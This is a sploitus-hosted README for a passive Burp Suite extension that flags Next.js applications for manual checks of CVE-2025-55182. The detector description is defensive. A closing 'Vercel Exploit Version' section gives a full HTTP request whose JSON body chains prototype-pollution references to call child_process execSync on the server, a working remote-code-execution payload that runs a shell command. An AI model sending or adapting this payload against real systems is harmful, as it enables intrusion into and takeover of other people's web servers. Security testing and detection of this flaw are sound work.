## https://sploitus.com/exploit?id=3F8F9E23-32F4-5FC5-9160-F47CC7D3CC3D
# CVE-2025-55182 Burp Passive Extension
Passive Burp Suite extension (Jython) that spots Next.js applications and reminds testers to manually verify the newly disclosed CVE-2025-55182.
## What it does
- Hooks into Burp's passive scanner and inspects every HTTP response your tools capture (Proxy, Repeater, Scanner, etc.).
- Looks for a small set of reliable Next.js markers in headers and body (e.g., `__NEXT_DATA__`, `/_next/data/`, `Next-Router-*`).
- Raises exactly one high-severity issue per URL when a marker is found, so the Target/Scanner views show a single, noise-free reminder.
- Provides background text prompting analysts to review framework version, routing, preview mode, and API routes for CVE-2025-55182 risks; no active traffic is generated.
## Why it helps
- Quickly highlights pages served by Next.js without running active checks.
- Keeps findings tidy by suppressing duplicates per URL.
- Serves as a checklist trigger: patch validation, cache/CDN hardening, and manual proof-of-concept testing remain with the analyst.
## How to use
1. In Burp, load `nextjs_passive_detector.py` via Extender → Extensions → Add → Python.
2. Ensure Jython is configured (legacy in-process model). No external libraries required.
3. Browse the target; any Next.js-backed page will surface a "Critical: Next.js Detected (manual CVE-2025-55182 check)" passive issue with the original request/response attached.

## Scope & limits
- Detection is passive only; it does not validate exploitation and will not send additional requests.
- Results depend on visible framework markers; heavily customized builds that strip Next.js identifiers may evade detection.
- One finding per URL by design—revisit manually if the page behavior changes during testing.
## Vercel Exploit Version
VERCEL Payload:
```bash
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Next-Action: meh
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: 580
------WebKitFormBoundary
Content-Disposition: form-data; name="0"
{"then": "$1:__proto__:then", "status":"resolved_model", "reason": -1, "value": "{\"then\": \"$B0\"}", "_response": {"_prefix": "var res = process.mainModule.require('child_process').execSync('ls -la /home',{'timeout':5000}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});", "_formData": {"get": "$1:constructor:constructor"}}}
------WebKitFormBoundary
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundary--
```
## Disclaimer
This tool is for educational and authorized testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. The developers assume no liability and are not responsible for any misuse or damage caused by this program.